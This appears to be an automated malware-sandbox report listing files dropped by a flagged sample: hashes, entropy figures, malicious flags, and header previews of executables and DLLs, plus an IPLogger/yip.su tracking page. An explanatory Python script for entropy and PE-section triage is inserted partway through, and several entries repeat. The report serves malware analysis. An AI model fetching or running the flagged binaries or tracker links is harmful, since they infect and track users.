File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
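The entries above give an 8-bit entropy, an "Encrypted" flag, hashes and a hex/ASCII preview for each dropped file, but not how those fields are derived or how to tell the two PE families apart. The following triage script is an added example, not Joe Sandbox's code: it recomputes the entropy figure, hashes a buffer, walks a PE section table from e_lfanew, and flags the two linker signatures visible in the previews (the Borland "MZP" stub with CODE/DATA/BSS sections used by the 2172545-byte dropper, and the NSIS `.ndata` section of the 2146073-byte installer). The 7.9 "likely packed" cut-off is an assumed heuristic, and the sample buffers are constructed minimal PE images and a seeded pseudo-random blob, not the real dropped files.

```python
import hashlib
import math
import random
import struct


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (the "Entropy (8bit)" figure in the report).

    Uniformly random bytes approach 8.0; packed or encrypted payloads such as the
    2172545-byte dropper (7.9948) sit close to that ceiling.
    """
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_section_names(data: bytes) -> list:
    """Return the section names of a PE image, or [] if the buffer is not a PE.

    Only the fields needed to reach the section table are read: e_lfanew at DOS
    offset 0x3C, NumberOfSections at COFF+2 and SizeOfOptionalHeader at COFF+16.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size
    names = []
    for i in range(num_sections):
        off = table + i * 40  # IMAGE_SECTION_HEADER is 40 bytes; the name is its first 8
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


PACKED_THRESHOLD = 7.9  # assumed heuristic cut-off, not a Joe Sandbox constant


def triage(data: bytes) -> dict:
    """Hashes, entropy and linker/installer hints for one dropped-file buffer."""
    sections = pe_section_names(data)
    ent = shannon_entropy(data)
    hints = []
    if data[:3] == b"MZP":
        hints.append("Borland/Delphi-linked stub (MZP)")
    if ".ndata" in sections:
        hints.append("NSIS installer (.ndata section)")
    if {"CODE", "DATA", "BSS"} & set(sections):
        hints.append("Borland-style section names")
    return {
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "entropy": round(ent, 6),
        "likely_packed": ent > PACKED_THRESHOLD,
        "sections": sections,
        "hints": hints,
    }


def build_fake_pe(stub: bytes, section_names: list) -> bytes:
    """Constructed minimal PE32 with the given DOS stub bytes and section names (sample input only)."""
    dos = bytearray(64)
    dos[:len(stub)] = stub
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew: PE header right after the DOS header
    coff = bytearray(20)
    struct.pack_into("<H", coff, 0, 0x14C)             # IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", coff, 2, len(section_names))
    struct.pack_into("<H", coff, 16, 224)              # PE32 optional header size
    table = b"".join(n.encode().ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + bytes(coff) + bytes(224) + table


# Constructed samples standing in for the dropped files above, not the real binaries.
DELPHI_SAMPLE = build_fake_pe(b"MZP", ["CODE", "DATA", "BSS", ".idata", ".tls", ".rdata", ".reloc", ".rsrc"])
NSIS_SAMPLE = build_fake_pe(b"MZ", [".text", ".data", ".rdata", ".bss", ".idata", ".ndata", ".rsrc"])
PACKED_BLOB = random.Random(1).randbytes(65536)        # seeded pseudo-random: near-8.0 entropy, no PE header

if __name__ == "__main__":
    for label, blob in (("delphi", DELPHI_SAMPLE), ("nsis", NSIS_SAMPLE), ("packed", PACKED_BLOB)):
        print(label, triage(blob))
```

Run against a real dropped file with `triage(open(path, "rb").read())`; the MD5/SHA1/SHA-256 values should match the report's fields, and an entropy near 7.99 with no recognisable section names is the combination the report labels "Encrypted: true" for the first dropper.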
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.76847378561161
Encrypted:false
SSDEEP:49152:rnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHA:WWqlkLESgCRE/vhOjb05efd6e/oXHA
MD5:8297ED4155F5D7C649F090DD34135CFD
SHA1:C6A61E7CE69E1196C87B3F34139CEF3FA70A97C7
SHA-256:BB3EE419CCCA57D4AD34E80C5218F7F45B2ACEC451CA9E2C7083F18D0E74F757
SHA-512:AA001D8B620209319F30CA9034FC3D03550F884EA6761A22E43E3221566BE6B612E1CEA4689494AE2E52400E3AF4628952327FBD86A14D191100DE9B7DD776FC
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.7684776130530935
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:VnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXH2:MWqlkLESgCRE/vhOjb05efd6e/oXH2
                                                                                                                                                                                                                                MD5:EF362A02A819074B78817FCE97CDF704
                                                                                                                                                                                                                                SHA1:D5FD2177A91CCCFE24A56D3D2F662B642440D86A
                                                                                                                                                                                                                                SHA-256:EAF3FE1CAB65A7E731534E5B6134F32A7C844BBE14C3712B87FA5900108A1A1D
                                                                                                                                                                                                                                SHA-512:0198C6D3F4D07231641A162A44F754C8DACADB8CDCFFE49E537F3C6A88496C1E519BD2DC7D2D830AA6B1459DBF7FD9C937A283CF536B18C5EC61E5BC30278D42
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.7684774510672066
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:nnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHV:SWqlkLESgCRE/vhOjb05efd6e/oXHV
                                                                                                                                                                                                                                MD5:F373B534C3183D8B0486968AB562D38A
                                                                                                                                                                                                                                SHA1:CFEE54793DC2AD3D75ED508E365F72BD99DBE7D7
                                                                                                                                                                                                                                SHA-256:34E5E9ADB4D4BFCA12810D692E01C6FC4C4E7C90C07FF61346C867863133B012
                                                                                                                                                                                                                                SHA-512:6309CC3E583BD7797B50E15867AD0AC9F158189E92EBD69D6207C55F57D5039DFC38C305F8205470FA788865778B4AB3B98AAA5468F69021320BF1C32BDBEBBC
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):44506112
                                                                                                                                                                                                                                Entropy (8bit):7.999974839733338
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:786432:LGKQI6b1K2iURSVSRO4ro3zDThekLomyAl5as15mLyxPiWfBeyfgLVoIg9ftDrZs:PQlb1K2VRNro3znhnh15oy4WHfGVu9tW
                                                                                                                                                                                                                                MD5:D9642F79DB7C8E81AF430E2FC06487A4
                                                                                                                                                                                                                                SHA1:0F646F2D41A9BA0BE71FAF88D795DEEAA09F55D9
                                                                                                                                                                                                                                SHA-256:0466AEB7A0ABCBC7B1442F1A63382D09FB6DE1CEF3FF6323E2842B1129395737
                                                                                                                                                                                                                                SHA-512:945C6357316BB7E269BE39AF914717BAF309B742CD5D47E94E75F5E851363F3E763A3A34CE1F31F841C8241BF026F1D1B2074BCA6116AF03F53CE46E9D849B2A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):608080
Entropy (8bit):6.833616094889818
Encrypted:false
SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):450024
Entropy (8bit):6.673992339875127
Encrypted:false
SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:5FF1FCA37C466D6723EC67BE93B51442
SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2046288
Entropy (8bit):6.787733948558952
Encrypted:false
SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Reputation:unknown
Preview:1

Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):257872
Entropy (8bit):6.727482641240852
Encrypted:false
SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:4E52D739C324DB8225BD9AB2695F262F
SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\syncUpd.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):80880
Entropy (8bit):6.920480786566406
Encrypted:false
SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:A37EE36B536409056A86F50E67777DD7
SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
